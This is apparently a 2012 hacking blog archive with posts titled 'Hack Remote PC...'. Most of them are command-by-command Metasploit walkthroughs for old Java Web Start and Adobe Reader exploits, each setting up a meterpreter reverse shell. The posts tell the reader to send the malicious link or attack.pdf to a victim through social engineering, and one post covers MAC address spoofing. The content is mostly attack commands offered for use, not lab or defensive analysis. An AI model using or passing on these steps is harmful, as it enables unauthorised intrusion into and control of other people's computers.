Archive for March, 2012

Hack Remote PC using Sun Java Command Line Injection

0
1 year ago
by Raj Chandel in ,
Sun Java Web Start Plugin Command Line Argument Injection

This module exploits a flaw in the Web Start component of the Sun Java Runtime Environment. The arguments passed to Java Web Start are not properly validated, allowing injection of arbitrary arguments to the JVM. By utilizing the lesser known -J option, an attacker can take advantage of the -XXaltjvm option, as discussed previously by Ruben Santamarta. This method allows an attacker to execute arbitrary code in the context of an unsuspecting browser user. In order for this module to work, it must be run as root on a server that does not serve SMB. Additionally, the target host must have the Web Client service (WebDAV Mini-Redirector) enabled

Exploit Targets

0 – Automatic (default)

1 – Java Runtime on Windows x86

Requirement

Attacker: Backtrack 5

Victim PC: Windows XP

Open backtrack terminal type msfconsole

Hack Remote PC using Sun Java Command Line Injection

Now type use exploit/windows/browser/java_ws_vmargs

Msf exploit (java_ws_vmargs)>set payload windows/meterpreter/reverse_tcp

Msf exploit (java_ws_vmargs)>set lhost 192.168.1.3 (IP of Local Host)

Msf exploit (java_ws_vmargs)>set srvhost 192.168.1.3 (This must be an address on the local machine)

Msf exploit (java_ws_vmargs)>set srvport 80

Msf exploit (java_ws_vmargs)>set uripath / (The Url to use for this exploit)

Msf exploit (java_ws_vmargs)>exploit

Hack Remote PC using Sun Java Command Line Injection

Now an URL you should give to your victim http://192.168.1.3/

Hack Remote PC using Sun Java Command Line Injection

Send the link of the server to the victim via chat or email or any social engineering technique.

Now you have access to the victims PC. Use “Sessions -l” and the Session number to connect to the session. And Now Type “sessions -i ID“ 

Hack Remote PC using Sun Java Command Line Injection

How to Change MAC Address in Backtrack5

0
1 year ago
by Raj Chandel in ,

Open your backtrack terminal and type ifconfig to check your MAC Address

How to Change MAC Address in Backtrack 5

In terminal, type ifconfig eth0 down this command is used for disabling the eth0 interface.

Now change the MAC address by using a simple command in backtrack macchanger –r eth0

Now type ifconfig eth0 up this command is used for enabling the eth0 interface

How to Change MAC Address in Backtrack 5

Now you can check your spoofed MAC Address type ifconfig

How to Change MAC Address in Backtrack 5

Hack any Remote PC with Adobe JBIG2Decode Heap Corruption Exploit

0
1 year ago
by Raj Chandel in ,

This module exploits a heap-based pointer corruption flaw in Adobe Reader 9.0.0 and earlier. This module relies upon JavaScript for the heap spray.

Exploit Targets

0 – Adobe Reader v9.0.0 (Windows XP SP3 English) (default)

1 – Adobe Reader v8.1.2 (Windows XP SP2 English

Requirement

Attacker: Backtrack 5 

Victim PC: Windows XP

Open backtrack terminal type msfconsole

Hack any Remote PC with Adobe JBIG2Decode Heap Corruption Exploit

Now type use exploit/windows/browser/adobe_jbig2decode

Msf exploit (adobe_jbig2decode)>set payload windows/meterpreter/reverse_tcp

Msf exploit (adobe_jbig2decode)>set lhost 192.168.1.4 (IP of Local Host)

Msf exploit (adobe_jbig2decode)>set srvhost 192.168.1.4 (This must be an address on the local machine)

Msf exploit (adobe_jbig2decode)>set uripath akonsong (The Url to use for this exploit)

Msf exploit (adobe_jbig2decode)>exploit

Hack any Remote PC with Adobe JBIG2Decode Heap Corruption Exploit

Now an URL you should give to your victim http://192.168.1.4:8080/akonsong

Hack any Remote PC with Adobe JBIG2Decode Heap Corruption Exploit

Send the link of the server to the victim via chat or email or any social engineering technique.

Hack any Remote PC with Adobe JBIG2Decode Heap Corruption Exploit

When the victim opens that link in their browser, immediately it will alert a dialog box about akonsong PDF like picture below.

Hack any Remote PC with Adobe JBIG2Decode Heap Corruption Exploit

Now you have access to the victims PC. Use “Sessions -l” and the Session number to connect to the session. And Now Type “sessions -i ID

Hack any Remote PC with Adobe JBIG2Decode Heap Corruption Exploit

How to Hack Remote PC using PDF

3
1 year ago
by Raj Chandel in ,
Adobe FlateDecode Stream Predictor 02 Integer Overflow

This module exploits integer overflow vulnerability in Adobe Reader and Adobe Acrobat Professional versions before 9.2.

Exploit Targets

0 – Adobe Reader Windows Universal (JS Heap Spray) (default)

Requirement

Attacker: Backtrack 5

Victim PC: Windows XP

Open backtrack terminal type msfconsole

How to Hack Remote PC using PDF

Now type use exploit/windows/fileformat/adobe_flatedecode_predictor02

Msf exploit (adobe_flatedecode_predictor02)>set payload windows/meterpreter/reverse_tcp

Msf exploit (adobe_flatedecode_predictor02)>show options

How to Hack Remote PC using PDF

Msf exploit (adobe_flatedecode_predictor02)>set lhost 192.168.1.3 (IP of Local Host)

Msf exploit (adobe_flatedecode_predictor02)>set filename attack.pdf

Msf exploit (adobe_flatedecode_predictor02)>exploit

After we successfully generate the malicious PDF, it will stored on your local computer

/root/.msf4/local/attack.pdf

How to Hack Remote PC using PDF

Now we need to set up a listener to handle reverse connection sent by victim when the exploit successfully executed.

use exploit/multi/handler

set payload windows/meterpreter/reverse_tcp

set lhost 192.168.1.3

exploit

Now send your attack.pdf files to victim, as soon as they download and open it. Now you can access meterpreter shell on victim computer

How to Hack Remote PC using PDF

Go to Top